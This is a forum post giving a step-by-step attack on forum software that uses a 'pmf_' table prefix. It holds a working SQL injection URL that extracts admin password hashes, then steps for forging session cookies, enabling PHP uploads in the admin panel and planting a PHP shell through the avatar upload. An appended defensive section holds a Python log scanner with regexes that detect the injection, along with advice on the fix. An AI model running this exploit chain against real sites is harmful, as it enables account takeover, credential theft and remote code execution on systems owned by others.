Sm0ke (Moderator)
Joined: Nov 25, 2006
Posts: 141
Location: Finland

1. Register at the forum.
2. Post a message in any forum.
3. Open the url, replacing "24" with the id of your post:
http://target/editpost.php?id=24+union+select+concat(char(58,58,58),id,char(58,58,58),pass,char(58,58,58)),id+from+pmf_user+where+group_id=1+order+by+1+asc+/*
4. The id and md5 hash should appear in the textarea on this page. It will look like:
:::1:::21232f297a57a5a743894a0e4a801fc3:::
This uses the table prefix "pmf_". If you have trouble getting the hash and suspect a problem with the table prefix, simply look at the error at the top of the page and you will see in their SQL what prefix they are using.
After the hash:
1. If you take a look at your cookie after logging in, you will see pmfUserId and pmfPass. These can be replaced with the user id and md5 hash you retrieved.
2. After changing the cookie, go to /admin/upload.php. You can try to upload a file here; the location will be http://target/forum/images/default/evil.php.
3. Sometimes upload.php doesn't work because of directory permissions. In that case, go to the admin panel and click on Dateitypen->hinzufügen in the nav window.
4. Add new datatype:
Benutzergruppe: leave as -
Dateiendung: php
Icon: leave blank, or put in %images%/image.gif
max. Dateigröße: 500
Dateianhang: check ja
Avatar: check ja
and submit.
5. Log in as your user. Go to your profile and upload the php file as your avatar; it can be any php file, it doesn't need to be a jpg or named .jpg.
6. The shell will be uploaded at http://target/forum/images/avatar/$id.php where $id is your user id.
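From the defender's side, the first step above leaves a distinctive trace in the web server access log: a request to editpost.php whose id parameter is not a plain integer and carries UNION/SELECT, char() or a /* comment terminator. The following is an added detection example, not code from the original post or from the forum software; the log lines, IP addresses and timestamps are constructed, and the regexes are assumptions about what a reasonable first-pass rule looks like.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Combined Log Format style, not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /editpost.php?id=24 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /editpost.php?id=24+union+select+concat(char(58,58,58),id,char(58,58,58),pass,char(58,58,58)),id+from+pmf_user+where+group_id=1+order+by+1+asc+/* HTTP/1.1" 200 2048
10.0.0.9 - - [01/Jan/2024:10:00:09 +0000] "GET /editpost.php?id=24%20UNION%20SELECT%201,2%2F* HTTP/1.1" 200 2048
10.0.0.7 - - [01/Jan/2024:10:01:00 +0000] "GET /admin/upload.php HTTP/1.1" 200 300
"""

# Client IP and the quoted request line ("METHOD target HTTP/x.y").
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Keywords that have no business in a numeric id: UNION ... SELECT, char(, or a /* terminator.
SQLI_RE = re.compile(r"\bunion\b.*\bselect\b|/\*|\bchar\s*\(", re.IGNORECASE)


def suspicious_id_requests(log_text):
    """Return [(client_ip, decoded_id_value), ...] for editpost.php requests
    whose id parameter is not a plain integer and contains SQL keywords."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith("/editpost.php"):
            continue
        # parse_qs decodes %xx escapes and '+' the same way PHP's $_GET does,
        # so encoded variants of the same payload are normalised before matching.
        for value in parse_qs(parts.query).get("id", []):
            if value.isdigit():
                continue  # well-formed numeric id, nothing to flag
            if SQLI_RE.search(value):
                hits.append((m.group("ip"), value))
    return hits


if __name__ == "__main__":
    for ip, payload in suspicious_id_requests(SAMPLE_LOG):
        print(f"{ip}: {payload}")
```

Only the id parameter is inspected here; in practice the same check belongs on every integer parameter, and the real fix is a parameterized query plus casting id to int in the application.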